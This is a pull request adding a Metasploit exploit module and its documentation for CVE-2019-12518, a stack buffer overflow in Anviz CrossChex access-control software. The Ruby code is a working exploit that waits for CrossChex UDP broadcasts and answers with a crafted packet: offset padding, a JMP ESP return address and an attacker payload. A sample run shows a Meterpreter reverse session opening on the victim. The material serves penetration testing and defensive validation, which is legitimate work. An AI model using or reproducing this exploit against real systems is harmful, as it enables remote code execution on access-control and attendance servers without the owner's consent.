### PR TITLE
Add crosschex buffer overflow exploit

### DIFF
--- a/documentation/modules/exploit/windows/misc/cross_device_bof.md
+++ b/documentation/modules/exploit/windows/misc/cross_device_bof.md
@@ -1,6 +1,6 @@
 ## Introduction
 
-CrossChex (a personnel identity verification, access control, and time attendance management system compatible with Windows 7,8 & 10), uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control device is vulnerable to a Stack Buffer Overflow attack, tracked as CVE-2019-12518, and as such permits abritrary code execution.
+CrossChex is a personnel identity verification, access control, and time attendance management system compatible with Windows 7,8 & 10. It uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control device is vulnerable to a Stack Buffer Overflow attack on CrossChex versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518, and as such permits abritrary code execution.
 
 The code used to overflow the Stack Buffer and code an attacker wishes to be executed as a result of the exploit are sent in a single UDP packet as a response to the CrossChex broadcast. As both the exploit and the payload must be contained inside a single UDP packet, an exploit has a maximum size of `8947 Characters`.    
 

--- a/documentation/modules/exploit/windows/misc/cross_device_bof.md
+++ b/documentation/modules/exploit/windows/misc/cross_device_bof.md
@@ -1,6 +1,6 @@
 ## Introduction
 
-CrossChex (a personnel identity verification, access control, and time attendance management system), uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control deviceis vulnerable to a Stack Buffer Overflow attack, tracked as CVE-2019-12518, and as such permits abritrary code execution.
+CrossChex (a personnel identity verification, access control, and time attendance management system compatible with Windows 7,8 & 10), uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control device is vulnerable to a Stack Buffer Overflow attack, tracked as CVE-2019-12518, and as such permits abritrary code execution.
 
 The code used to overflow the Stack Buffer and code an attacker wishes to be executed as a result of the exploit are sent in a single UDP packet as a response to the CrossChex broadcast. As both the exploit and the payload must be contained inside a single UDP packet, an exploit has a maximum size of `8947 Characters`.    
 

--- a/modules/exploits/windows/http/cross_device_bof.md
+++ b/modules/exploits/windows/http/cross_device_bof.md
@@ -1,0 +1,57 @@
+## Introduction
+
+CrossChex (a personnel identity verification, access control, and time attendance management system), uses UDP broadcasts to identify and connect with Access Control devices on a network. The code used to handle a response from an Access Control deviceis vulnerable to a Stack Buffer Overflow attack, tracked as CVE-2019-12518, and as such permits abritrary code execution.
+
+The code used to overflow the Stack Buffer and code an attacker wishes to be executed as a result of the exploit are sent in a single UDP packet as a response to the CrossChex broadcast. As both the exploit and the payload must be contained inside a single UDP packet, an exploit has a maximum size of `8947 Characters`.    
+
+This module exploits CVE-2019-12518 by listening for a CrossChex "new device" broadcast for a given number of seconds (`TIMEOUT`). It then responds with a UDP packet containing shellcode for both the Buffer Overflow exploit and the attacker's chosen payload. The `Space` payload option ensures no payload of too large a size is used to ensure successful explotation. If a broadcast is not detected within the given `TIMEOUT`, the module exits with a warning. 
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use windows/misc/crosschex_device_bof`
+3. `set LHOST vboxnet0`
+4. `run`
+5. Open CrossChex
+6. Navigate to Device > Add
+7. Select `Search`
+8. Verify payload executes correctly
+
+## Options
+
+1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
+2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
+3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.
+
+## Compatible Payloads
+
+Any basic x86 windows payload.
+
+## Payload Options
+As above.
+
+## Scenarios
+
+```
+msf5 exploit(windows/misc/crosschex_device_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] CrossChex broadcast received, sending payload in response
+[*] Payload sent
+[*] Sending stage (180291 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000
+
+meterpreter > ls
+Listing: C:\Program Files\Anviz\CrossChex Standard
+==================================================
+...
+
+
+
+```
+
+## References
+
+1. <https://cvedetails.com/cve/CVE-2019-12518>
+2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
+3. <https://www.exploit-db.com/exploits/47734>

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Anviz CrossChex Local Buffer Overflow',
+      'Name'        => 'Anviz CrossChex Buffer Overflow',
       'Description'	=> %q{
         Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
         triggering a stack buffer overflow.
@@ -52,8 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
               {}
             ]
           ],
-      'DefaultTarget'  => 0,
-      'Stance' => Msf::Exploit::Stance::Aggressive
+      'DefaultTarget'  => 0
       ))
     deregister_udp_options
   end

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -44,7 +44,11 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             [
               'Crosschex Standard x86 <= V4.3.12',
-              {}
+              {
+                  'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
+                  'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+                  'Shift' => 4 # Positions payload to be written at beginning of ESP
+              }
             ]
           ],
       'DefaultTarget'  => 0
@@ -67,9 +71,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status "CrossChex broadcast received, sending payload in response"
-    sploit = rand_text_english(261)
-    sploit << "\x07\x18\x42\x00" # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
-    sploit << rand_text_english(4) # Positions payload to be written at beginning of ESP
+    sploit = rand_text_english(target['Offset'])
+    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
     sploit << payload.encoded
 
     udp_sock.sendto(sploit, host, port)

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -15,8 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'Anviz CrossChex Local Buffer Overflow',
       'Description'	=> %q{
-      Waits for broadcasts from Ainz CrossChex looking for new devices, and returns custom broadcast packet was
-      crafted and sent to the network, triggering the buffer overflow.},
+        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
+        triggering buffer overflow.
+      },
       'Author'	  	=>
         [
             'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
             'CHOST' => "0.0.0.0",
             'CPORT' => 5050
         },
-      'Platform' => ["win"],
       'Payload'        =>
         {
             'Space'    => 8947,
@@ -50,12 +49,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'Targets'        =>
           [
             [
-              'Crosschex Standard x86 <= V4.3.12'
+              'Crosschex Standard x86 <= V4.3.12',
+              {}
             ]
           ],
       'DefaultTarget'  => 0
       ))
     deregister_udp_options
+    register_options(
+        [
+            Opt::CPORT(5050, true, 'Port used to send Broadcast response from. 5050 is expected.'),
+            Opt::CHOST("0.0.0.0", true, 'IP address response is sent from.'),
+            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast', 100])
+        ])
   end
 
   def exploit

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch' => ARCH_X86,
       'Privileged'	=> true,
       'Platform' => 'win',
-      'DisclosureDate' => '2019 Nov 28',
+      'DisclosureDate' => '2019-11-28',
       'Targets'        =>
           [
             [

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -1,4 +1,3 @@
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -6,7 +5,6 @@
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
-  PAYLOAD_MAX_LENGTH = 8947
   PACKET_LEN = 10
 
   include Msf::Exploit::Remote::Udp
@@ -16,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'        => 'Anviz CrossChex Local Buffer Overflow',
       'Description'	=> %q{
         Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
-        triggering buffer overflow.
+        triggering a stack buffer overflow.
       },
       'Author'	  	=>
         [
@@ -28,9 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'		  => MSF_LICENSE,
       'References'	=>
         [
-            ['CVE', "2019-12518"],
-            ['URL', "https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html"],
-            ['EDB', "47734"]
+            ['CVE', '2019-12518'],
+            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
+            ['EDB', '47734']
         ],
       'DefaultOptions' =>
         {
@@ -39,9 +37,14 @@ class MetasploitModule < Msf::Exploit::Remote
             'CHOST' => "0.0.0.0",
             'CPORT' => 5050
         },
+      'Payload'        =>
+        {
+            'Space'    => 8947,
+        },
+      'Arch' => ARCH_X86,
       'Privileged'	=> true,
       'Platform' => 'win',
-      'DisclosureDate' => 'Nov 28, 2019',
+      'DisclosureDate' => '2019 Nov 28',
       'Targets'        =>
           [
             [
@@ -56,22 +59,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if payload.encoded.length > PAYLOAD_MAX_LENGTH
-      print_error "Encoded payload is too large for delivery."
-      return
-    end
-
     connect_udp
 
     res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])
     unless res
-      print_error("Module timed out waiting for CrossChex broadcast")
-      return
+      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
     end
 
     print_status "CrossChex broadcast received, sending payload in response"
     sploit = rand_text_english(261)
-    sploit << "\x07\x18\x42\x00"
+    sploit << "\x07\x18\x42\x00" # Overwrites to payload // Vulnerable CrossChex versions don't use ASLR or DEP
     sploit << rand_text_english(4)
     sploit << payload.encoded
 

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -30,12 +30,6 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
             ['EDB', '47734']
         ],
-      'DefaultOptions' =>
-        {
-            'TIMEOUT' => 100,
-            'CHOST' => "0.0.0.0",
-            'CPORT' => 5050
-        },
       'Payload'        =>
         {
             'Space'    => 8947,
@@ -67,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect_udp
 
-    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"] > 0 ? (datastore["TIMEOUT"]) : (nil))
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
     if res.empty?
       fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
     end
@@ -80,5 +74,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     udp_sock.sendto(sploit, host, port)
     print_status "Payload sent"
-  end
+    end
 end

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -33,7 +33,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
             'TIMEOUT' => 100,
-            'EncoderType' => Msf::Encoder::Type::Raw,
             'CHOST' => "0.0.0.0",
             'CPORT' => 5050
         },
@@ -43,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'DisableNops' => true
         },
       'Arch' => ARCH_X86,
+      'EncoderType' => Msf::Encoder::Type::Raw,
       'Privileged'	=> true,
       'Platform' => 'win',
       'DisclosureDate' => '2019-11-28',
@@ -58,17 +58,17 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_udp_options
     register_options(
         [
-            Opt::CPORT(5050, true, 'Port used to send Broadcast response from. 5050 is expected.'),
-            Opt::CHOST("0.0.0.0", true, 'IP address response is sent from.'),
-            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast', 100])
+            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
+            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
+            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
         ])
   end
 
   def exploit
     connect_udp
 
-    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])
-    unless res
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"] > 0 ? (datastore["TIMEOUT"]) : (nil))
+    if res.empty?
       fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
     end
 

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status "CrossChex broadcast received, sending payload in response"
     sploit = rand_text_english(261)
-    sploit << "\x07\x18\x42\x00" # Overwrites to payload // Vulnerable CrossChex versions don't use ASLR or DEP
+    sploit << "\x07\x18\x42\x00" # Overwrites EIP to point to payload // Vulnerable CrossChex versions don't use ASLR or DEP
     sploit << rand_text_english(4)
     sploit << payload.encoded
 

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
             'Space'    => 8947,
+            'DisableNops' => true
         },
       'Arch' => ARCH_X86,
       'Privileged'	=> true,
@@ -67,8 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status "CrossChex broadcast received, sending payload in response"
     sploit = rand_text_english(261)
-    sploit << "\x07\x18\x42\x00" # Overwrites EIP to point to payload // Vulnerable CrossChex versions don't use ASLR or DEP
-    sploit << rand_text_english(4)
+    sploit << "\x07\x18\x42\x00" # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+    sploit << rand_text_english(4) # Positions payload to be written at beginning of ESP
     sploit << payload.encoded
 
     udp_sock.sendto(sploit, host, port)

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'CHOST' => "0.0.0.0",
             'CPORT' => 5050
         },
+      'Platform' => ["win"],
       'Payload'        =>
         {
             'Space'    => 8947,
@@ -49,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Targets'        =>
           [
             [
-              'Crosschex Standard x86 <= V4.3.12',
-              {}
+              'Crosschex Standard x86 <= V4.3.12'
             ]
           ],
       'DefaultTarget'  => 0

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -1,0 +1,80 @@
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  PAYLOAD_MAX_LENGTH = 8947
+  PACKET_LEN = 10
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Anviz CrossChex Local Buffer Overflow',
+      'Description'	=> %q{
+      Waits for broadcasts from Ainz CrossChex looking for new devices, and returns custom broadcast packet was
+      crafted and sent to the network, triggering the buffer overflow.},
+      'Author'	  	=>
+        [
+            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
+            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
+            'agalway-r7',  # Module creation
+            'adfoster-r7' # Module creation
+        ],
+      'License'		  => MSF_LICENSE,
+      'References'	=>
+        [
+            ['CVE', "2019-12518"],
+            ['URL', "https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html"],
+            ['EDB', "47734"]
+        ],
+      'DefaultOptions' =>
+        {
+            'TIMEOUT' => 100,
+            'EncoderType' => Msf::Encoder::Type::Raw,
+            'CHOST' => "0.0.0.0",
+            'CPORT' => 5050
+        },
+      'Privileged'	=> true,
+      'Platform' => 'win',
+      'DisclosureDate' => 'Nov 28, 2019',
+      'Targets'        =>
+          [
+            [
+              'Crosschex Standard x86 <= V4.3.12',
+              {}
+            ]
+          ],
+      'DefaultTarget'  => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive
+      ))
+    deregister_udp_options
+  end
+
+  def exploit
+    if payload.encoded.length > PAYLOAD_MAX_LENGTH
+      print_error "Encoded payload is too large for delivery."
+      return
+    end
+
+    connect_udp
+
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])
+    unless res
+      print_error("Module timed out waiting for CrossChex broadcast")
+      return
+    end
+
+    print_status "CrossChex broadcast received, sending payload in response"
+    sploit = rand_text_english(261)
+    sploit << "\x07\x18\x42\x00"
+    sploit << rand_text_english(4)
+    sploit << payload.encoded
+
+    udp_sock.sendto(sploit, host, port)
+    print_status "Payload sent"
+  end
+end


### PR DESCRIPTION
Adds new metasploit module that waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom packet, triggering buffer overflow.

## Verification

Vulnerable software can be found [here](https://www.exploit-db.com/exploits/47734).

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use windows/misc/crosschex_device_bof`
- [ ] `set LHOST vboxnet0`
- [ ] `run`
- [ ] Open CrossChex
- [ ] Navigate to Device > Add
- [ ] Select `Search`
- [ ] **Verify** payload executes correctly
- [ ] TODO: **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

